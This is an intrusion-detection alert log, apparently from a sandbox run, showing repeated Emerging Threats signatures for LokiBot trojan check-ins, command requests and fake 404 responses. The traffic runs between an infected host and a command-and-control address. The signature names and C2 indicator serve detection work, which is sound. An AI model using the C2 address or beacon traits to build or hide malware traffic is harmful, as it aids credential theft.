                                                                                        01/05/21-19:06:31.319802TCP2025483ET TROJAN LokiBot Fake 404 Response8049226185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.542986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.542986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.697483TCP2025483ET TROJAN LokiBot Fake 404 Response8049227185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:31.903232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:31.903232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.053069TCP2025483ET TROJAN LokiBot Fake 404 Response8049228185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:32.262786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.262786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.426688TCP2025483ET TROJAN LokiBot Fake 404 Response8049229185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:32.647726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.647726TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:32.815517TCP2025483ET TROJAN LokiBot Fake 404 Response8049230185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.031393TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.031393TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.190810TCP2025483ET TROJAN LokiBot Fake 404 Response8049231185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.398944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.398944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.560619TCP2025483ET TROJAN LokiBot Fake 404 Response8049232185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:33.770156TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2025381ET TROJAN LokiBot Checkin4923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.770156TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:33.939742TCP2025483ET TROJAN LokiBot Fake 404 Response8049233185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.165366TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.165366TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.334828TCP2025483ET TROJAN LokiBot Fake 404 Response8049234185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.564013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.564013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.721364TCP2025483ET TROJAN LokiBot Fake 404 Response8049235185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:34.935155TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:34.935155TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.122327TCP2025483ET TROJAN LokiBot Fake 404 Response8049236185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:35.342016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.342016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.512183TCP2025483ET TROJAN LokiBot Fake 404 Response8049237185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:35.726449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.726449TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:35.894052TCP2025483ET TROJAN LokiBot Fake 404 Response8049238185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.098105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.098105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.277202TCP2025483ET TROJAN LokiBot Fake 404 Response8049239185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.491085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.491085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.491085TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.491085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.657367TCP2025483ET TROJAN LokiBot Fake 404 Response8049240185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:36.879808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:36.879808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.043514TCP2025483ET TROJAN LokiBot Fake 404 Response8049241185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:37.256017TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.256017TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.425204TCP2025483ET TROJAN LokiBot Fake 404 Response8049242185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:37.635343TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.635343TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:37.804227TCP2025483ET TROJAN LokiBot Fake 404 Response8049243185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.018241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.018241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.186781TCP2025483ET TROJAN LokiBot Fake 404 Response8049244185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.389239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.389239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.563167TCP2025483ET TROJAN LokiBot Fake 404 Response8049245185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:38.784644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.784644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:38.965108TCP2025483ET TROJAN LokiBot Fake 404 Response8049246185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.177876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.177876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.331864TCP2025483ET TROJAN LokiBot Fake 404 Response8049247185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.554968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2025381ET TROJAN LokiBot Checkin4924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.554968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.738314TCP2025483ET TROJAN LokiBot Fake 404 Response8049248185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:39.944185TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2025381ET TROJAN LokiBot Checkin4924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:39.944185TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.121556TCP2025483ET TROJAN LokiBot Fake 404 Response8049249185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.335810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2025381ET TROJAN LokiBot Checkin4925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.335810TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.507894TCP2025483ET TROJAN LokiBot Fake 404 Response8049250185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:40.714092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2025381ET TROJAN LokiBot Checkin4925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.714092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:40.893523TCP2025483ET TROJAN LokiBot Fake 404 Response8049251185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.109834TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2025381ET TROJAN LokiBot Checkin4925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.109834TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.281018TCP2025483ET TROJAN LokiBot Fake 404 Response8049252185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.488492TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2025381ET TROJAN LokiBot Checkin4925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.488492TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.665959TCP2025483ET TROJAN LokiBot Fake 404 Response8049253185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:41.875312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2025381ET TROJAN LokiBot Checkin4925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:41.875312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.043815TCP2025483ET TROJAN LokiBot Fake 404 Response8049254185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.266645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2025381ET TROJAN LokiBot Checkin4925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.266645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.432654TCP2025483ET TROJAN LokiBot Fake 404 Response8049255185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:42.638995TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2025381ET TROJAN LokiBot Checkin4925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.638995TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:42.805691TCP2025483ET TROJAN LokiBot Fake 404 Response8049256185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.011253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2025381ET TROJAN LokiBot Checkin4925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.011253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.168522TCP2025483ET TROJAN LokiBot Fake 404 Response8049257185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.372296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2025381ET TROJAN LokiBot Checkin4925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.372296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.526493TCP2025483ET TROJAN LokiBot Fake 404 Response8049258185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:43.756835TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2025381ET TROJAN LokiBot Checkin4925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.756835TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24925980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:43.913405TCP2025483ET TROJAN LokiBot Fake 404 Response8049259185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.120266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2025381ET TROJAN LokiBot Checkin4926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.120266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.276026TCP2025483ET TROJAN LokiBot Fake 404 Response8049260185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.485788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2025381ET TROJAN LokiBot Checkin4926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.485788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.652260TCP2025483ET TROJAN LokiBot Fake 404 Response8049261185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:44.876902TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2025381ET TROJAN LokiBot Checkin4926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:44.876902TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.053688TCP2025483ET TROJAN LokiBot Fake 404 Response8049262185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.261637TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2025381ET TROJAN LokiBot Checkin4926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.261637TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.422623TCP2025483ET TROJAN LokiBot Fake 404 Response8049263185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.633934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2025381ET TROJAN LokiBot Checkin4926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.633934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.789961TCP2025483ET TROJAN LokiBot Fake 404 Response8049264185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:45.996354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2025381ET TROJAN LokiBot Checkin4926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:45.996354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.162508TCP2025483ET TROJAN LokiBot Fake 404 Response8049265185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.366773TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2025381ET TROJAN LokiBot Checkin4926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.366773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.523351TCP2025483ET TROJAN LokiBot Fake 404 Response8049266185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:46.730742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2025381ET TROJAN LokiBot Checkin4926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.730742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:46.897287TCP2025483ET TROJAN LokiBot Fake 404 Response8049267185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.102635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2025381ET TROJAN LokiBot Checkin4926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.102635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.257102TCP2025483ET TROJAN LokiBot Fake 404 Response8049268185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.475682TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2025381ET TROJAN LokiBot Checkin4926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.475682TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24926980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.647987TCP2025483ET TROJAN LokiBot Fake 404 Response8049269185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:47.867741TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2025381ET TROJAN LokiBot Checkin4927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:47.867741TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.042229TCP2025483ET TROJAN LokiBot Fake 404 Response8049270185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:48.254686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2025381ET TROJAN LokiBot Checkin4927180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:48.254686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24927180192.168.2.22185.206.215.56
